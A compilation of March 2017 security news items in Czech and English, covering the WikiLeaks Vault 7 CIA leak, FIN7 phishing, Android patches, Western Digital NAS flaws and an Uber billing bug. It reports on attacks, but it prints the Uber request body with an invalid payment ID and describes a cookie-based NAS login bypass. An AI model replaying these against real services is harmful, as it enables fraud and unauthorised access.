Dokumenty mimo jiné ukazují, že CIA spolupracovala s britskou MI5 na projektu Weeping Angel, který se zaměřoval na televize značky Samsung, u kterých je možné na dálku ovládat mikrofon. Organizacím se také podařilo získat kontrolu nad moderními automobily či kamiony. Existuje speciální oddělení zaměřující se na získání přístupu a ovládání mobilních zařízení iPhone a iPad. To dohromady se zero-day exploity pro Android umožňuje CIA obejít šifrování aplikací WhatsApp, Signal, Telegram, Wiebo, Confide a Cloackman hacknutím ‚chytrých‘ telefonů a sběrem audia a zpráv ještě před zašifrováním. Ve skutečnosti tak nejsou ohroženy šifrovací algoritmy a jmenovat konkrétní „prolomenou“ aplikaci je zavádějící, jak upozorňují lidé z Telegramu.
Analýza dokumentů upozornila na další zajímavé možnosti týkající se mobilních telefonů. Na některých přístrojích (jmenován byl Samsung Galaxy S2) je možné čipset přepnout do monitorovacího režimu a odposlouchávat provoz na okolních Wi-Fi sítích. Tato vlastnost je ve firmware za normálních okolností blokována, ale CIA se podařilo ochranu obejít díky reverznímu inženýrství – Broadcom tedy pravděpodobně přímo nepomáhal. Zajímavé také je, že exploit se do telefonu dostává přes hudební přehrávač Apollo. Není ale jasné, zda jde o záměr tvůrce (který pracoval pro „vládní výzkumnou laboratoř“) nebo o další zneužití chyby v aplikaci.
Mezi dokumenty se nachází například také návod na úpravu instalačních obrazů Windows 8, která umožní obejít nutnost zadání instalačního klíče. Po úpravě (která se podle příkazů provádí v Linuxu) přibude v instalačním dialogu tlačítko „Skip“.
Při vývoji útočných nástrojů se používají kusy kódu pocházející z malware, který se volně šíří po internetu. Stejně tak byly některé postupy ukradeny konkurenčním organizacím jako britské GCHQ a americké NSA. Vývojáři mají k dispozici nástroje pro vytvoření útočného malware pro konkrétní situace. Mají se prý zaměřit na vývoj malých a dobře zacílených „řešení“ než na vývoj velkých nástrojů s mnoha funkcemi.
Mezi další odhalení patří to, že americký konzulát ve Frankfurtu je ve skutečnosti skrytá základna pro hackery CIA, kteří odtud pokrývají Evropu, střední Východ a Afriku.
Zajímavé je také to, jak se CIA jistila proti postihu: neoznačila své útočné systémy jako tajné. V opačném případě by totiž nemohla kód používat na internetu, tedy jej nahrávat na cizí počítače a zařízení. Existují totiž zákony, které brání takovému veřejnému použití utajených nástrojů a informací. Podle WikiLeaks navíc nemá vláda právo prosazovat zde autorské právo, brání jí v tom Ústava Spojených států amerických. Znamená to, že kdokoliv může takový neutajený materiál dále šířit bez obavy z postihu.
Další informace se budou určitě objevovat postupně, část dokumentů už byla prostudována, ale většina zatím ne. Internetová komunita už se pustila do čtení, budeme si muset počkat na další výsledky.
Server rakouského ministerstva opět napadli turečtí hackeři
8.3.2017 Novinky/Bezpečnost BigBrother
Server rakouského ministerstva zahraničí v pondělí znovu napadli turečtí hackeři. S odvoláním na mluvčího resortu o tom ve středu informoval deník Die Presse. Internetová stránka ministerstva byla kvůli útoku několik minut nedostupná, ale k úniku dat podle úřadu nedošlo.
Od loňského listopadu jde o třetí podobný incident, sdělil mluvčí resortu Thomas Schnöll. Zároveň dodal, že ministr Sebastian Kurz se útoky nenechá odradit od své politiky vůči Turecku.
Vztahy Vídně a Ankary jsou dlouhodobě napjaté. V Rakousku žijí stovky tisíc Turků, z nichž mnozí mají dvojí občanství. Zástupci Ankary mezi nimi hledají podporu pro navržené změny ústavy, které by výrazně posílily pravomoci tureckého prezidenta Recepa Tayyipa Erdogana.
V souvislosti s těmito změnami vypsala Ankara na duben referendum. Rakouská vláda žádala zmrazení přístupových jednání mezi Evropskou unií a Tureckem a Kurz v pondělí řekl, že očekává, že turečtí politici nebudou v Rakousku vystupovat za účelem agitace v tureckém předvolebním boji.
V Rakousku se v posledních měsících stalo terčem hackerů letiště, ministerstva, centrální banka a parlament. K útokům se přihlásila anonymní turecká skupina, která jako motiv uvedla "vůči Turecku nepřátelské" chování Rakouska. Na konci února napsal list Der Kurier, že podle rakouské rozvědky má napadení serverů na svědomí turecký nacionalista žijící v USA.
Wikileaks zveřejnilo údajné dokumenty CIA, které popisují hackerské operace
8.3.2017 Živě.cz
Uskupení Wikileaks o sobě dává po pár měsících opět hlasitě vědět, do světa totiž vypustilo dokumenty, které údajně popisují nejrůznější kybernetické operace americké CIA včetně průniků do mobilních operačních systémů, Windows i chytrých televizorů nebo třeba využívání nejrůznějších odposlouchávacích USB zařízení a keyloggerů.
Pakliže jsou dokumenty pravé, bude se pravděpodobně jednat o přinejmenším stejně závažný únik dat jako v případě NSA a Edwarda Snowdena. V tomto případě ale vypadá prezentace Wikileaks trošku jinak. Namísto nejrůznějších powerpointových prezentací se totiž jedná spíše o detailní postupy připomínající jakousi Wikipedii pro tajné operace. Editoři Wikileaks zároveň anonymizovali jména a některé další citlivé a konkrétní údaje o operacích.
V každém případě, letmý náhled do zveřejněných dokumentů, pakliže jsou pravé, dává tušit, že popisují nejrůznější základní postupy pro kybernetické útoky a penetrační testy, které se třeba od těch, které popisuje dokumentace linuxové bezpečnostní distribuce Kali Linux liší především v tom, že mají exotické názvy jako třeba SnowOwl, HarpyEagle nebo GreenPaket.
Dočtete se zde jak o průnicích s využitím nejrůznějších nástrojů, které připomínají mezi hackery dobře známý Metasploit a jemu podobné, tak o zneužití třeba rootu na platformě Android.
Sama CIA podobné úniky nekomentuje, aktuální kauza tedy bude vyžadovat důkladnou analýzu.
Cybercriminals Target Employees Involved in SEC Filings
8.3.2017 securityweek Cyber
A cybercrime group tracked by FireEye as FIN7 has been observed targeting nearly a dozen organizations in the United States, focusing on personnel that handles filings to the Securities and Exchange Commission (SEC).
The attack starts with a spear phishing email coming from a spoofed sec.gov email address, which carries a document apparently containing “important” information. Once the document is opened, a VBS script installs a new PowerShell backdoor dubbed POWERSOURCE.
POWERSOURCE has also been used to download a second-stage PowerShell backdoor named TEXTMATE, which provides a reverse shell to the attacker. POWERSOURCE is an obfuscated and modified version of the publicly available DNS_TXT_Pwnage tool, while TEXTMATE is a fileless malware. Both rely on DNS TXT requests for command and control (C&C) communications.
POWERSOURCE has also been spotted delivering Cobalt Strike’s Beacon post-exploitation tool, which had been used in previous FIN7 operations as well. FireEye noted that the domain serving the Beacon payload had also hosted a Carbanak backdoor sample compiled in February 2017. FIN7 has been known to rely heavily on Carbanak malware.
FireEye has identified 11 targets in the financial services, transportation, education, retail, IT services, and electronics sectors. While the SEC-themed spear-phishing campaign focuses on organizations in the United States, experts believe it is possible that the cybercriminals have launched similar operations in other countries, leveraging the names of their respective regulators.
The security firm said its products and services blocked these attacks in their early stages, which prevented researchers from determining what the attackers were after.
“If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse,” FireEye researchers said in a blog post. “Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.”
In previous attacks, FIN7 used various point-of-sale (PoS) malware families to steal sensitive financial information from targeted organizations. The Carbanak malware used by the group is known for its role in campaigns that involved fraudulent bank transactions and ATM attacks.
UK's 1E Challenges Tanium With New Endpoint Detection & Response (EDR) Tool
8.3.2017 securityweek Security
Tachyon Takes on Tanium With Promise to Go From Detection to Remediation Across the Entire IT Estate in Seconds
Time to detect and time to remediate is the difference between an incident and data loss. But while there have been dozens of new products designed to help the security team detect incidents, there has been very little that helps IT Ops remediate rapidly across the entire estate.
One of the problems is that detection and remediation are separate operations often handled by separate teams: security and IT. But security is not IT's only customer -- it must also respond to compliance, audit, and virtually every operational department in the organization with requests for enhancements or completely new apps.
The result is a huge workload made more difficult by the false positives that come from many of today's threat detection systems. According to 1E's own research involving 1000 IT professionals, more than half spend 25% of their time responding to unplanned incidents coming from urgent security updates, configuration changes and software audits.
Today 1E has launched Tachyon, designed to give IT operations instant actionable access into the furthest reaches of the entire IT estate (up to 1.5 million endpoints), regardless of distribution or operating system. Agents on every endpoint, whether server, desktop, mobile or IoT device can be queried from the Tachyon server. Incidents can be isolated and remedial action taken -- within seconds across the entire estate.
Stuart Okin, SVP of product at 1E, told SecurityWeek to think of Tachyon's front end like 'a Google for the IT estate'. Questions can be asked and replies drawn from every endpoint in seconds. Based on those answers, remedital action can be taken -- again within seconds.
Okin gave an example involving abuse of Java. Assume that the security team has learned that a Java vulnerability is being exploited, and has passed this information to IT Ops. A single question to Tachyon asking for device software filtered by Java displays all devices at risk. A second question looks for historical evidence of connection to the attacker's IP address. Within seconds, all (if any) compromised devices have been located.
Further communication with the attacker can be blocked instantly by instructing Tachyon to add a new rule to the local firewall blocking that IP address. Repeating the process will now confirm that no devices can connect to the attacker.
This principle applies across the board. If the security team learns of current a threat or detects indications of compromise through other threat intelligence systems, and can define the threat, the IT team can use Tachyon to locate and remediate within seconds. Of course, it needn't be a security threat -- it could be a threat to regulatory status, or a requirement from audit. It could be used, for example, to locate privileged accounts with access to sensitive data and to remove any that are not strictly necessary. Confirmation with precise details on the remaining privileged accounts can be sent to audit as necessary.
Okin stressed that Tachyon is not designed to replace any existing investments, but to work with them to enhance their performance. Microsoft SCCM is an example. "While other vendors are promoting a rip-and-replace approach, we built Tachyon from the ground up to layer on top of Microsoft SCCM, with a light footprint that enables speed and responsiveness," commented Sumir Karayi, founder and CEO of 1E.
This was confirmed by a Fortune 500 health insurance company, which was one of the first users of Tachyon. "We rely heavily on Microsoft SCCM and other 1E solutions to automate everyday IT tasks such as software updates, but lacked the ability to identify and remediate severe problems instantly," said the organization's infrastructure engineer manager. "1E's Tachyon adds those real-time capabilities - helping us 'save the day' in an emergency. With Tachyon, we can now address big problems in seconds rather than hours, in an organized, controlled way."
Key to Tachyon's workings are agents on each endpoint. These query the device and maintain a secure communication with the Tachyon server. They provide the functionality for remedial steps, and ensure that the system is eminently extensible by allowing additional functionality to be introduced without requiring any upgrade to the core system. It is designed to be endpoint cross platform, supporting Microsoft, Mac, Linux, mobile and IoT -- making it suitable for large corporations and the emerging internet of things.
The strength of the Tachyon approach is that it doesn't replace anything, nor does it attempt to automate decision making. Indeed, where remedial action can be described as an 'impactful change', a second approval can be required before the remediation is actioned. It makes existing systems work more efficiently and very much faster. Organizations will still need threat analysts to recognize possible incidents; and IT Ops to effect remediation where necessary. Tachyon allows the two teams to work together far more effectively, so that a potential incident can go to detection and remediation in seconds rather than hours or days.
Google Patches 35 Critical Android Vulnerabilities
8.3.2017 securityweek Vulnerebility
Google this week released a new set of monthly security patches for Android to address over 100 vulnerabilities in the platform, 35 of which carry a Critical severity rating.
In a newly published Security Bulletin, Google reveals that two partial security patch level strings are rolling out this month: the 2017-03-01 security patch level to resolve 36 vulnerabilities (11 Critical, 15 High, 9 Moderate, 1 Low), and the 2017-03-05 security patch level to address 71 flaws (24 Critical, 32 High, 14 Moderate, 1 Low).
The 11 Critical flaws resolved with the 2017-03-01 security patch level include nine Remote Code Execution (RCE) issues in Mediaserver; one RCE in OpenSSL & BoringSSL; and an Elevation of privilege (EoP) vulnerability in recovery verifier.
The 15 vulnerabilities rated High included three RCE bugs in AOSP Messaging, libgdx, and Framesequence library; two EoP issues in Audioserver; one EoP in NFC; and nine Denial of Service (DoS) vulnerabilities in Mediaserver.
The Medium risk flaws include EoP issues in Location Manager, Wi-Fi, Package Manager, and System UI; Information disclosure vulnerabilities in AOSP Messaging and Mediaserver; and DoS bugs in Setup Wizard and Mediaserver. The Low severity issue addressed in 2017-03-01 security patch level is a DoS vulnerability in Audioserver.
The 24 Critical risk issue resolved in 2017-03-05 security patch level include 19 EoP vulnerabilities (seven in MediaTek components, five in NVIDIA GPU driver, two in kernel ION subsystem, one in Broadcom Wi-Fi driver, one in kernel FIQ debugger, one in Qualcomm GPU driver, and two in kernel networking subsystem) and 5 various vulnerabilities in Qualcomm components.
Elevation of privilege issues clearly dominated the patch level, given that 25 rated High severity were addressed as well. They affected kernel networking subsystem, Qualcomm input hardware driver, MediaTek Hardware Sensor Driver, Qualcomm ADSPRPC driver, Qualcomm fingerprint sensor driver, Qualcomm crypto engine driver, Qualcomm camera driver, MediaTek APK, Qualcomm Wi-Fi driver, Synaptics touchscreen driver, Qualcomm IPA driver, HTC Sensor Hub Driver, NVIDIA GPU driver, Qualcomm networking driver, kernel security subsystem, and Qualcomm SPCom driver.
Six of the remaining High risk issues addressed in 2017-03-05 security patch level are Information disclosure vulnerabilities (affecting kernel networking subsystem, MediaTek driver, Qualcomm bootloader, Qualcomm power driver, NVIDIA GPU driver), while the last one is a Denial of service vulnerability in kernel cryptographic subsystem.
The Moderate risk flaws addressed in this patch level include an EoP in Qualcomm camera driver (device specific), and 13 Information disclosure bugs (in Qualcomm Wi-Fi driver, MediaTek video codec driver, Qualcomm video driver, Qualcomm camera driver, HTC sound codec driver, Synaptics touchscreen driver, and kernel USB gadget driver). The Low severity bug was an Information disclosure vulnerability in Qualcomm camera driver.
All of the above issues should be addressed by security patch levels of 2017-03-05 or later, Google notes on its advisory. The company already started pushing an over-the-air update to Google Devices (Android One, Nexus, and Pixel devices) with the March 05, 2017 security patch level.
Bechtel Opens Industrial Cyber Security Lab
8.3.2017 securityweek ICS
Global engineering and construction giant Bechtel has opened a new cyber security lab aimed at protecting industrial equipment and software that control facilities such as power plants, chemical plants, and other large-scale critical infrastructure operations.
With the goal of protecting industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems from cyber threats, Bechtel says the lab will leverage its experience designing and implementing National Institute of Standards and Technology Risk Management Framework (NIST-RMF) solutions for its government customers.
"The ability to access and control these systems over the Internet, while increasing efficiency, has also exposed some vulnerabilities. There is a dark side to the Internet of Things," said Chad Hartman, program director in Bechtel's government services business. "By using innovative solutions, this lab will give us the ability to test and secure critical systems in a safe environment, which translates into more secure, and resilient equipment for our customers."
Bechtel also announced that it has entered into a research arrangement with George Mason University to provide Mason students with access to the lab.
"These partnerships are critical for universities and for companies," said Robert Osgood, director of Mason's Computer Forensics program and a former FBI supervisory special agent in cyber-crime and counterterrorism. "The laboratory will provide research and internship opportunities for our students and open up a potential talent pipeline for Bechtel in a rapidly growing field."
"Whether we are talking about control systems or telecommunications infrastructure, there is a real need to develop innovative solutions that address the current world environment,” said Patrick Fredericks, program manager for the Strategic Infrastructure Group (SIG) for Bechtel. “The merging of technology in both of these areas requires a new approach that supports global deployment of integrated technology solutions on a large scale, while also addressing the threats that we see now and in the future."
Founded in 1898, Bechtel operates through four global businesses: Infrastructure; Nuclear, Security & Environmental; Oil, Gas & Chemicals; and Mining & Metals.
Serious flaws in Western Digital My Cloud NAS devices allow attackers to fully control them
8.3.2017 securityaffairs Vulnerebility
Researchers discovered serious issues in Western Digital My Cloud NAS that can be exploited by attackers to gain root control of the affected devices.
Western Digital Corporation network-attached storage owners were warned of Critical flaws in Western Digital NAS boxes of the My Cloud NAS line could be exploited by remote attackers to gain remote control of the affected devices.
The attackers can combine the flaws to steal sensitive data or to exploit flawed devices in lateral movements.
“By combining the vulnerabilities documented in this advisory an attacker can fully compromise a WD My Cloud device. In the worst case one could steal sensitive data stored on the device or use it as a jump host for further internal attacks.”
“SEC Consult recommends not to attach WD My Cloud to the network until a thorough security review has been performed by security professionals and all identified issues have been resolved.” reads the advisory published by SCVL.
The affected products belong to Western Digital MyCloud NAS devices, including DL4100, EX4, EX2 Ultra and PR2100. The full list of flawed devices is available online.
The attackers can trigger the flaw to bypass logins, insert commands, upload files without permission, and gain control of boxes.
“This is a serious vulnerability, as the chances for the device to be fully compromised is very high,” explained the SEC Consult Vulnerability Lab (SCVL).
The flaws have been reported by SCVL experts to Western Digital on Jan. 18, 2016 and publicly disclosed the flaw March 7, 2017. Another group of experts from the security firm Exploitee.rs have discovered the vulnerabilities and publicly disclosed them.
The flaws discovered by the experts include a command injection vulnerabilities, a stack-based buffer overflow bug, and a cross-site request forgery flaw. As anticipated, by combining the exploitation of the cross-site request forgery issue with a command injection vulnerability the attacker can gain root access of the affected device and fully compromise it.
“The (cross-site request forgery flaw) can be combined with a command injection vulnerability to gain complete control (root access) of the affected device,” explained the advisory issued by the SCVL.
As of this writing, Western Digital has not provided any information regarding the vulnerabilities or supplied software updates to fix the reported bugs.
According to the researchers at Exploitee.rs, in December, the expert Steve Campbell discovered two command injection flaws in Western Digital MyCloud NAS (CVE-2016-10107 & CVE-2016-10108) that were patched by the company in the same month, but according to Exploitee.rs the patches did not fix the problems and introduced a new Login Bypass vulnerability.
The Exploitee.rs researcher Zenofex who analyzed the Login Bypass issue discovered a wrong implementation of the user authentication mechanism when the Secure Shell (SSH) access was enabled. The login check leverage on cookies that can be crafted by an attacker to bypass the login process.
“The above code contains a function called “login_check”, this function is used by all of the backend PHP scripts and is used to verify pre-authenticated users. The above code has two paths, one which involves checking the session values for “username” and “isAdmin” and another (if the prior fails) attempts to complete the same process but with cookies.” explained Zenofex.
“Because cookies are supplied by the user, the requirements that the scripts are looking for can be met by the attacker. The above process for sessions and cookies is summed up as follows.
“username” variable is set and is not empty – User is logged in as a normal privileged user.
“isAdmin” variable is set to 1 – User is logged in as an administrator.
This means that any time there is a login check within the PHP scripts, an attacker is able to bypass the check by supplying 2 specially crafted cookie values.”
The experts at Exploitee.rs have found 85 security issues tied to Western Digital My Cloud NAS devices
My Cloud users can contact the Customer Service for any question and to receive support. It is important that My Cloud NAS devices are configured to enable automatic firmware updates.
WikiLeaks releases documents detailing CIA hacking tools and capabilities
8.3.2017 securityaffairs BigBrothers
WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking tools and capabilities
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA).
The huge trove of data, called “Vault 7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.
“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virgina.” reads the announcement issued by WikiLeaks by Wikileaks.
“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”
According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.
The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.
The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.
The arsenal used by the Central Intelligence Agency hackers was composed of hacking tools developed by the CCI’s Engineering Development Group (EDG).
The developers at EDG are tacked for developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.
The CIA has dozens of zero-day exploit code in its arsenal that can be used to target almost any platform, from Windows and Linux PC, to Android and iOS mobile devices.
“CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation).” continues Wikileaks.
WikiLeaks confirmed that it will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons’ should analyzed, disarmed and published.”
The leaked documents also revealed that the CIA used hacking tools developed by the British intelligence agencies (GCHQ and MI5), the NSA, the FBI and also contractors.
The documents refer a joint development of the CIA and MI5 for the development of a malware, dubbed Weeping Angel, that was used to compromise Samsung Smart TV.
“The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.” continues Wikileaks.
The documents confirm that the CIA hackers were able to bypass the encryption implemented by most popular secure messaging apps such as Signal, WhatsApp, and Telegram.
The leaked files disconcerting scenario, the CIA was in possession of tools that were able to hack almost any platform, from modern vehicles to air-gapped systems.
WikiLeaks Exposed CIA's Hacking Tools And Capabilities Details
7.3.2017 thehackernews BigBrothers
WikiLeaks has published a massive trove of confidential documents in what appear to be the biggest ever leak involving the US Central Intelligence Agency (CIA).
WikiLeaks announced series Year Zero, under which the whistleblower organization will reveal details of the CIA's global covert hacking program.
As part of Year Zero, Wikileaks published its first archive, dubbed Vault 7, which includes a total of 8,761 documents of 513 MB (torrent | password) on Tuesday, exposing information about numerous zero-day exploits developed for iOS, Android, and Microsoft's Windows operating system.
WikiLeaks claims that these leaks came from a secure network within the CIA's Center for Cyber Intelligence headquarters at Langley, Virginia.
The authenticity of such dumps can not be verified immediately, but since WikiLeaks has long track record of releasing such top secret government documents, the community and governments should take it very seriously.
CIA's Zero-Day Exploits & Ability to Bypass Encrypted Apps
According to initial analysis and press release, the leak sheds light on the CIA's entire hacking capabilities, including its ability to hack smartphones and popular social media messaging apps including the world's most popular WhatsApp messaging app.
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Weibo, Confide and Cloackman by hacking the smartphones that they run on and collecting audio and message traffic before encryption is applied," WikiLeaks said.
The exploits come from a variety of sources, including partner agencies like NSA and GCHQ or private exploit traders, as well as the CIA's specialized unit in its Mobile Development Branch that develops zero-day exploits and malware for hacking smartphones, including iPhones and iPads.
"By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other weaponized malware," WikiLeaks said.
The agency can remotely activate smartphones' cameras and microphones at its will, allowing it to hack social media platforms before encryption can be applied, WikiLeaks claims in the statement on their website.
"Weeping Angel" Attack — Hacking Smart TVs to Spy On Users
Vault 7 also details a surveillance technique — codenamed Weeping Angel — used by the agency to infiltrate smart TV's, transforming them into covert microphones.
Samsung smart TVs, which previously drew criticism for their always-on voice command system, are vulnerable to Weeping Angel hacks that place the TVs into a “Fake-Off” mode.
In Fake-Off mode, the TV owner believes it is off when it is actually on, allowing the CIA to record conversations "in the room and sending them over the Internet to a covert CIA server."
HammerDrill v2.0: A Malware to Steal Data From Air Gapped PCs
The CIA's cyberweapon arsenal also includes a cross-platform malware, dubbed Hammer Drill, that targets Microsoft, Linux, Solaris, MacOS, and other platforms via viruses infecting through CDs/DVDs, USBs, data hidden in images, and other sophisticated malware.
What more interesting? Hammer Drill v2.0 also added air gap jumping ability used to target computers that are isolated from the Internet or other networks and believed to be the most secure computers on the planet.
Besides listing all hacking tools and operations, the documents also include instructions for using those hacking tools, tips on the configuration of Microsoft Visual Studio (which is classified as Secret/NOFORN), as well as testing notes for various hacking tools.
Some of the leaked documents even suggest that the CIA was even developing tools to remotely control certain vehicle software, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
For more details on the leak, you can peruse on the WikiLeaks' website.
WikiLeaks Releases Details on CIA Hacking Tools
7.3.2017 securityweek BigBrothers
WikiLeaks revealed on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA). The leak, dubbed “Vault 7,” apparently exposes the CIA’s vast hacking capabilities.
WikiLeaks said the files come from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, and they have been circulating among former U.S. government hackers and contractors. One of these individuals provided the data to the whistleblower organization, which has called it “the largest intelligence publication in history.”
According to WikiLeaks, the files, dated between 2013 and 2016, include malware and exploits targeting the products of several major tech companies, including Apple, Google, Microsoft and Samsung. The leaked tools can allegedly be used to hack mobile devices, desktop computers, routers, smart TVs and other types of systems.
WikiLeaks
These pieces of software are said to have been developed by the CCI’s Engineering Development Group (EDG). WikiLeaks said the EDG develops, tests and provides support for backdoors, exploits, Trojans, viruses and other types of malware used by the CIA.
In addition to hacking tools developed by its own people, the agency allegedly obtained tools from British intelligence agencies (GCHQ and MI5), the NSA, the FBI and cyber arms contractors. For instance, the agency is said to have collaborated with MI5 on the development of a tool designed for spying on people through Samsung smart TVs.
The CIA allegedly has dozens of zero day exploits designed for targeting devices running Android, iOS, Windows, OS X and Linux. WikiLeaks claims some of these tools even allow the agency to bypass the encryption of secure messaging apps such as Signal, WhatsApp, and Telegram.
However, this does not necessarily mean these applications have been compromised – an attacker who has root access to a mobile device can often access messages exchanged via secure IM apps without the need to break the encryption.
WikiLeaks will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed, disarmed and published.”
The files also appear to show that the CIA has developed tools designed for targeting the control systems of modern vehicles, multi-platform malware, and threats that add themselves to CDs and DVDs in order to jump air gaps.
Following the Edward Snowden leaks, the U.S. government has promised to disclose serious vulnerabilities that represent a high risk or affect a product that is widespread in critical infrastructure. If the files obtained by WikiLeaks are genuine, the CIA breached that commitment.
Bug Allowed Free Uber Rides
7.3.2017 securityweek Vulnerebility
A bug in Uber could have been used by users to ride for free anywhere where the service is available, a researcher has discovered.
Discovered by Anand Prakash from Bangalore, India, the issue could have been abused by attackers to take unlimited free rides from their Uber account. In fact, the researcher took free rides in both the United States and India to demonstrate the vulnerability, but only after the Uber team agreed to this, he says.
The issue was found to be related to the payment method that users are required to specify when creating an account on Uber.com. Such an account is required to be able to use the service, and users can either pay with cash when the ride is completed, or can have the cost automatically charged to their credit/debit card.
The researcher discovered that if an invalid payment method is specified, one could ride Uber for free. The bug, he explains, resides in a POST request to dial.uber.com. To reproduce the vulnerability, one would simply need to input an invalid value for “payment_method_id” in said request:
{"start_latitude":12.925151699999999,"start_longitude":77.6657536,
"product_id":"db6779d6-d8da-479f-8ac7-8068f4dade6f","payment_method_id":"xyz"}
Prakash reported the vulnerability to Uber via the company’s bug bounty program on HackerOne, which offers rewards between $100 and $10,000 for bugs in several dozen Uber properties. The issue was apparently discovered in August 2016, and Uber was able to fix it the same day the researcher disclosed it. The company awarded the researcher $5,000 for this finding.
In addition to making information about the issue public, the researcher also published a video that shows how the vulnerability can be abused.
A member of the HackerOne community since 2013, Prakash is actively hunting bugs in other services as well, including Twitter, Souq.com, Yahoo!, and Slack. The researcher is ranked 29 on HackerOne, but ranks 14 in Uber’s bug bounty program (and is placed third in Twitter’s).
Number of Darknet Sites Plunges After Freedom Hosting Hack
7.3.2017 securityweek Hacking
The number of hidden services has dropped significantly following the cyberattack on Freedom Hosting II, which had been estimated to host roughly 20 percent of the sites on the dark web.
Freedom Hosting II, which hosted nearly 11,000 websites, was brought down by Anonymous-affiliated hackers in early February. The hacktivists accused the service of hosting many child pornography sites, and leaked a large quantity of data from its systems, including over 380,000 user records.
An analysis conducted this month using OnionScan, an open source tool designed for investigating the dark web, showed that of more than 30,000 known Tor-based services, only just over 4,400 were still online.
“These 4,400 hidden services are far fewer than previous scans,” said anonymity and privacy researcher Sarah Jamie Lewis, who runs the OnionScan project. “We believe that the Freedom Hosting II takedown not only removed many thousands of active sites but also may have affected other hosting providers who were hosting some infrastructure on top of Freedom Hosting II.”
Lewis believes the drop in the number of hidden services may also be a result of the disappearance of secure email service Sigaint. The service went offline without warning a few weeks ago.
According to the latest OnionScan report, roughly 4,000 HTTP services have been detected on the dark web. The scan has also identified approximately 250 TLS services, 270 SSH services, 220 Bitcoin nodes, 100 SMTP services, and a handful of FTP and VNC services.
The scan also showed that many hidden services are still not configured properly; researchers have managed to extract almost a thousand unique IP addresses belonging to hidden services and the clearnet clients that accessed them.
Several reports have been published since April 2016, when the OnionScan tool was made available. However, Lewis said OnionScan reports will no longer be released in the near future as the focus will shift on trying to solve the underlying problems. The tool will continue to be maintained and improved with new features.
Researchers Use Intel SGX to Conceal Malware, Extract Private Keys
7.3.2017 securityweek Virus
A group of researchers from Austria's Graz University of Technology have demonstrated that malware running on Intel SGX (Software Guard Extensions) can attack the host and can be used to extract RSA private keys.
SGX, an isolation mechanism introduced by Intel in their micro-processors to protect code and data from modification or disclosure, uses special execution environments called enclaves and which work in encrypted memory area, thus protecting an application’s secrets from attackers. According to Intel, cryptographic keys should be stored inside enclaves, because they can thwart side-channel attacks.
While some argued before that the hardware-supported isolation could result in super malware inside enclaves, others refuted the fears, saying that enclaves always run with user space privileges and cannot perform any I/O operations. In a newly published paper (PDF), Graz University of Technology researchers prove that enclave malware can indeed attack its hosting system.
“We demonstrate a cache attack from within a malicious enclave that is extracting secret keys from co-located enclaves. Our proof-of-concept malware is able to recover RSA keys by monitoring cache access patterns of an RSA signature process in a semi-synchronous attack. The malware code is completely invisible to the operating system and cannot be analyzed due to the isolation provided by SGX,” the paper reads.
This attack, the report says, is the first malware running on real SGX hardware that abuses the SGX protection features to conceal itself. The researchers were able to demonstrate the attack both in a native environment and across multiple Docker containers and explain that they performed a Prime+Probe cache side-channel attack on a co-located SGX enclave running an up-to-date RSA implementation that was using a constant-time multiplication primitive.
The attack was successful despite the lack of timers, large pages, physical addresses, and shared memory in SGX enclaves. Moreover, the researchers were able to extract 96% of an RSA private key from a single trace in a semi-synchronous attack, and even managed to “extract the full RSA private key in an automated attack from 11 traces within 5 minutes.”
The paper reveals that both the target program (which uses SGX to protect an RSA signing application) and the malicious application are unprivileged and run on the same host machine. The malware keeps the attack code inside an SGX enclave to avoid detection, with the loader being used only to start the enclave. The malware can remain undetected even if state-of-the-art malware detection software is used, the researchers say.
Countermeasures to prevent such attacks are also proposed: exponent blinding and bit slicing at source level; enclave coloring, removing access to high-resolution timers, allowing cloud provider to access and scan enclaves for malicious activities, heap randomization, and Intel CAT (cache allocation technology) at OS level; and combining Intel CAT with SGX and using secure RAM at hardware level.
“Besides not fully preventing malicious enclaves, SGX provides protection features to conceal attack code. Even the most advanced detection mechanisms using performance counters cannot detect our malware. Intel intentionally does not include SGX activity in the performance counters for security reasons. However, this unavoidably provides attackers with the ability to hide attacks as it eliminates the only known technique to detect cache side-channel attacks,” the researchers say.
WordPress 4.7.3 is out to fix 6 security issues, but CSRF flaw remains unpatched
7.3.2017 securityaffairs Vulnerebility
WordPress 4.7.3 release is out to fix six security issues, but a CSRF vulnerability discovered in July 2016 remains unpatched.
